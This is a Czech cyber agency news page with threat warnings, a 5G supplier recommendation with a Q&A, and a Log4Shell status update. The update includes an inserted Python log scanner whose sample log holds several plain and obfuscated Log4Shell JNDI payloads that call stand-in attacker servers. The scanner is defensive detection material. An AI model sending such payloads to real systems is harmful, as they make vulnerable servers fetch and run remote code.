National Cyber and Information Security Agency

Selected News

NÚKIB issued a warning

The National Cyber and Information Security Agency issues the following warning against a cyber security threat consisting of non-compliance with contractual obligations by suppliers of ICT services and products with significant ties to the Russian Federation. The Agency rates the threat as High – the threat is likely to very likely.

You can find the whole document: Warning

NÚKIB issued a warning

The National Cyber and Information Security Agency issues the following warning against a cyber security threat consisting of cyber attacks on information and communication systems in the Czech Republic, in particular on public administration systems, but also on other strategic organisations. These attacks can affect the availability, confidentiality or integrity of information in important information and communication systems.

The Agency assesses this threat as Critical - The threat is very likely to almost certain.

You can find the whole document: Warning


The Recommendation for assessing the trustworthiness of technology suppliers of 5G networks in the Czech Republic

The National Cyber and Information Security Agency (NÚKIB), together with the Ministry of Industry and Trade, the Ministry of Foreign Affairs, the Security Information Service, the Office for Foreign Relations and Information, and Military Intelligence, published The Recommendation for assessing the trustworthiness of technology suppliers of 5G networks in the Czech Republic (hereinafter the "Recommendation"). The role of next-generation telecommunications networks in society is essential. Efforts to reduce security risks are therefore necessary in order to create and maintain a resilient infrastructure in the Czech Republic. The aim of the Recommendation is to offer operators, and the entire electronic communications sector, the views of the relevant state institutions on the crucial points for assessing the trustworthiness of suppliers of 5G network technologies, and to propose criteria that can contribute to the selection of trustworthy suppliers.

The publication of the Recommendation further builds upon the internationally declared position of the Czech Republic in the field of 5G network security. In 2019, a series of recommendations called the Prague Proposals on cyber security of communication networks was announced. Subsequently, the Czech Republic also participated considerably in preparing the EU 5G Toolbox, which was published at the European Union level in 2020.

"The Recommendation provides guidance especially for supplies to the information and communication systems of the critical infrastructure of the Czech Republic. During the preparation of the criteria, the possibility of their evaluation as well as their measurability was emphasized. These criteria are also universal principles that can be applied in a similar way in other sectors when implementing technologies," says Karel Řehka, the director of NÚKIB. "Although the Recommendation does not extend, cancel, or otherwise regulate any rights and obligations stipulated by generally binding legal regulations, it is necessary to set a trend in which trust towards a supplier does not depend only on the final technical form of the delivered solution, but also reflects the strategic level, meaning the business, legal and political environment in which the supplier operates," the director adds.

Among the criteria the Recommendation suggests are, for example, whether a supplier has a transparent ownership structure, whether it can prove that it applies the security-by-design principle in its products, and whether it practices effective security rules and processes.

The Recommendation was also discussed at the working group for cyber security under the 5G Alliance, which includes representatives of state bodies, representatives of academia, mobile operators, and other representatives of entrepreneurs in the electronic communications sector.

You can find the whole document: The Recommendation for assessing the trustworthiness of technology suppliers of 5G networks in the Czech Republic


Q&A on NÚKIB’s activities in the field of 5G networks – the Recommendation

Q: Why do you publish the Recommendation?

A: The need to address matters connected with the trustworthiness of technology suppliers has been discussed at the expert level for some time now. The importance of this debate increased further after the publication of the EU toolbox of mitigating measures for the secure rollout and operation of 5G networks, known as the EU 5G Toolbox. Some of its measures, which the Czech Republic has committed itself to fulfil, require action by the state for which the legal competences are currently lacking. Thus, before these competences are established in legislation, the state acts within the limits of its current powers and provides operators with guidelines that can help increase the security of their networks and services.

Following a discussion among the relevant state security institutions, the Recommendation was prepared. Within the current state competences, the document presents their view on supply chain security and offers operators ways to increase the security of their networks and minimize the negative impact on the provision of services to end customers.

Q: Why do you publish the Recommendation now?

A: Although the rollout of 5G networks is already underway and these networks are already in commercial operation in some parts of the Czech Republic, not all of the functionality that these networks can potentially bring has yet been put into operation. Until legislation that will allow the state to give operators a legal framework for building these networks is adopted, we want to help the telecommunications sector by publishing security guidelines, at least in the form of a recommendation, which offers operators non-binding security criteria.

Q: Who is the Recommendation for?

A: The aim of the Recommendation is to provide guidance to telecommunications operators who administer critical infrastructure information and communication systems. The Recommendation offers the view of selected state institutions on the basis for assessing the trustworthiness of technology suppliers in 5G networks and proposes criteria that can contribute to the selection of trusted suppliers. Nevertheless, the proposed criteria are universal principles that can be applied in a similar way in other sectors when implementing technologies.

Q: Do operators have to comply with the Recommendation?

A: The Recommendation is by its nature non-binding supporting material and therefore brings no new obligations for operators. Some parts of the Recommendation, however, correspond to existing legal obligations or to best practice that operators already follow voluntarily within their own business processes. The Recommendation is, in addition, based on international best practice and was prepared after discussions among the relevant state security institutions.

Q: If the Recommendation is not mandatory for operators, does this mean that there are currently no restrictions on the selection of suppliers?

A: Operators, as well as other entities regulated by the Cyber Security Act, must comply with the supplier management obligations set out in that Act, as well as with other legal obligations. Furthermore, the NÚKIB warning from 2018 is still in effect, and the relevant entities regulated by the Cyber Security Act must take it into account.

Q: Is it possible to understand the Recommendation as a model for future legal regulation?

A: The form of possible future regulation is currently subject to expert discussion, and the resulting legislation will be in the hands of legislators, so its form cannot be anticipated at this time.

Q: The topic of 5G networks has been discussed for a long time now. Why didn't the state start addressing this issue earlier?

A: NÚKIB, as well as other state bodies, has been dealing with the cyber security of 5G networks for a long time. Already in 2019, NÚKIB organized the first Prague 5G Security Conference, which generated a significant international response, and we were also one of the main initiators of addressing this issue at the EU level, from which the EU 5G Toolbox emerged. Immediately after the adoption of the common approach of the EU Member States, we began preparing the Czech legal environment for the implementation of the EU 5G Toolbox measures, and the Recommendation issued now is part of this process.

Q: Is it true that operators cannot evaluate some of the supplier trustworthiness criteria in the Recommendation themselves?

A: When creating the criteria, emphasis was placed on their universal applicability and on their evaluability by the entities operating electronic communications networks and services, i.e. the operators. However, if an operator is not able to evaluate some of the criteria effectively, for example due to a lack of information or staff capacity, or if the relevant supplier does not meet some of the criteria, this does not automatically mean that it would be inappropriate to use the supplier. The applicability and weight of each criterion always depend on the context of the respective supply and, above all, on the judgement of the operator. Nevertheless, we are convinced that fulfilment of the criteria increases the credibility of the supplier.

Q: Will the Recommendation affect the price of telecommunications services?

A: The Recommendation does not impose any new rules or obligations on operators, so it should not affect service prices. In other countries where similar measures have been taken, no increase in service prices for this reason has been observed. However, it should be kept in mind that the security of electronic communications networks is a fundamental interest of the state, as well as of every individual, and ensuring it is not free of charge.

One month since the release of the reactive measure to the Log4Shell vulnerability: NCISA does not see widespread abuse in the Czech Republic, but caution remains in order

More than a month has passed since the reactive measure related to the Log4Shell vulnerability was issued. This vulnerability, CVE-2021-44228, is present in the Apache Log4j logging component and has the highest possible criticality score, CVSS 10.0. Log4j is used by hundreds of systems and applications for logging; at the time of detection the total number of vulnerable systems worldwide was estimated in the high hundreds of millions, which makes Log4Shell highly critical. The vulnerability allows an attacker to attack even systems that are not directly accessible from the Internet, to execute code on them without any authentication, and to gain full control of the server. This allows attackers to obtain access credentials, read and exfiltrate data, or install further malicious code, including ransomware, all with relatively little effort, since exploiting this vulnerability is not technically difficult.

The Log4Shell vulnerability was announced on 9 December and NCISA alerted to its presence on its website the next day. After several days of analysing and evaluating the potential impact on Czech cybersecurity, the agency decided to issue a reactive measure pursuant to Section 13 of Act No. 181/2014 Coll., on Cybersecurity.

After NCISA issued the reactive measure on 15 December, additional vulnerabilities were discovered in Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105). Once the security community's eyes were focused on Log4j, researchers around the world began analysing it and found additional vulnerabilities in the affected logging component. However, none of these vulnerabilities was as critical as the original Log4Shell, and none has been widely exploited. Although CVE-2021-45046 has a criticality score of 9.0, the recommendations in the reactive measure applied to the entire Log4j component, so no additional change was required. In general, however, organisations need to maintain awareness of new vulnerabilities and continually update all of their systems.

The consequences of Log4Shell are not yet as extensive as we expected for such a critical vulnerability. As of 21 January 2022, NCISA has registered three incidents and classifies all of them as "minor" given their limited impact:

- The administrators of the first organisation decided to check their systems for the vulnerability after NCISA issued the reactive measure. While implementing the recommended procedures, they found a log on one of their servers that indicated a possible security incident. The attacker was caught while trying to install a remote management tool on their systems.
- In the second case, the attackers installed cryptominer software on the attacked organisation's web server.
- In the third organisation, attackers compromised a mobile device management server, but the data shows they were unable to get deeper into the infrastructure.
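Checking logs for exploitation attempts, as the first organisation above did, is something any operator of a Java service can do without special tooling. The following is an added example (not NCISA's code or any tool the page mentions) that scans a constructed excerpt of a web-server access log for Log4Shell attempts. The point it makes is that a naive grep for `${jndi:` misses the obfuscated forms attackers actually use, so the scanner first percent-decodes the line and then resolves nested Log4j lookups (`${lower:…}`, `${upper:…}`, `${…:-default}`) inside-out, the way the library would, before looking for the JNDI lookup and extracting the callback server. The log lines and IP addresses are constructed for this example (RFC 5737 documentation ranges), and the `scan` function and its output format are this example's own.

```python
"""Scan web-server access logs for Log4Shell (CVE-2021-44228) exploitation attempts.

Added example, not NCISA's code. The log lines below are constructed for this
example; the addresses come from RFC 5737 documentation ranges.
"""
import re
import urllib.parse

# Constructed access-log excerpt (Apache combined-log style), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:08:12:01 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Dec/2021:08:12:03 +0100] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://198.51.100.23:1389/a}"
10.0.0.9 - - [10/Dec/2021:08:12:04 +0100] "GET /?x=${${lower:j}${upper:n}di:${lower:r}mi://198.51.100.23/x} HTTP/1.1" 400 0 "-" "curl/7.68.0"
10.0.0.9 - - [10/Dec/2021:08:12:05 +0100] "GET / HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Adns%3A%2F%2F198.51.100.23%2Fy%7D"
10.0.0.11 - - [10/Dec/2021:08:12:06 +0100] "GET /search?q=${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.9/z} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# An innermost ${...} lookup: a body containing no nested "${" or "}".
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup: the scheme and the host[:port] the victim would connect to.
JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^/${}]+)", re.IGNORECASE)


def _resolve(m: re.Match) -> str:
    """Evaluate one Log4j lookup the way the library would, for the lookups
    attackers use to disguise the string 'jndi'. Anything else is left untouched."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)          # the real thing: keep it so the loop converges
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:               # ${name:-default} with an empty/bogus name -> default
        return body.split(":-", 1)[1]
    return m.group(0)              # unknown lookup (e.g. ${env:HOME}): leave as is


def url_decode(s: str, max_rounds: int = 3) -> str:
    """Undo (possibly repeated) percent-encoding, bounded to avoid looping forever."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def normalize(s: str, max_rounds: int = 20) -> str:
    """Decode, then resolve nested lookups inside-out until nothing changes."""
    s = url_decode(s)
    for _ in range(max_rounds):
        resolved = LOOKUP.sub(_resolve, s)
        if resolved == s:
            break
        s = resolved
    return s


def scan(log_text: str) -> list[dict]:
    """Return one finding per line carrying a JNDI lookup, with the callback target."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        hit = JNDI.search(normalize(line))
        if hit:
            findings.append({
                "line": lineno,
                "source_ip": line.split(" ", 1)[0],   # first field of the combined log format
                "scheme": hit.group(1).lower(),
                "target": hit.group(2),               # the attacker's LDAP/RMI/DNS server
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: {f['source_ip']} -> {f['scheme']}://{f['target']}")
```

Run against the sample, the scanner flags lines 2 to 5 and reports the callback host for each, while the plain request on line 1 is untouched. Note what it does not cover: only the `lower`, `upper` and `:-default` lookups are resolved, so other Log4j lookups used for obfuscation (for example `${date:…}` or `${sys:…}` tricks) would need to be added, and a hit only proves an attempt, not a successful exploit; confirming success means looking for the outbound LDAP, RMI or DNS connection from the Java process to the reported target.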

The situation is similar in the rest of the world. Immediately after the vulnerability was announced, it was widely exploited by cryptominer and botnet groups, and Conti, one of the most active ransomware groups, used it to launch attacks. However, no serious incidents involving APT groups are yet publicly known.

There are several plausible explanations. The first is that the victims may not know they have been compromised. The compromise could have occurred quickly, and more sophisticated attackers could have quickly established other forms of persistence and covered the tracks that would indicate Log4j had been exploited. In fact, many APT groups wait in their victims' networks for the right moment to strike, or try to remain undetected for cyber espionage purposes. Another explanation is that organisations have secured the products in which they use Log4j. After the reactive measure was issued, dozens of organisations contacted NCISA and requested system scans. At most organisations the scans were intercepted by scan-blocking technologies, which means that third parties cannot easily determine whether vulnerable systems are present in their infrastructure. A sophisticated attacker would be able to bypass such measures in a targeted attack, but against mass scanning, where attackers try to discover vulnerable systems with as little effort as possible, the measures are effective.

Despite this, it is likely that the number of incidents registered by NCISA in connection with the vulnerability is not final and more will be discovered. Log4Shell may also surface in incidents where attackers exploit it to move laterally within the infrastructure. By its nature, systems vulnerable to Log4Shell will persist in the medium term: Log4j is embedded in millions of programs and organisations depend on those programs' authors to patch them. In addition, the Microsoft Threat Intelligence Center (MSTIC) has confirmed that APT groups are adding Log4Shell to their toolset. These are groups that generally have long-term goals and often try to remain undetected in their victims' networks. There is therefore a real possibility that their attacks will materialize later.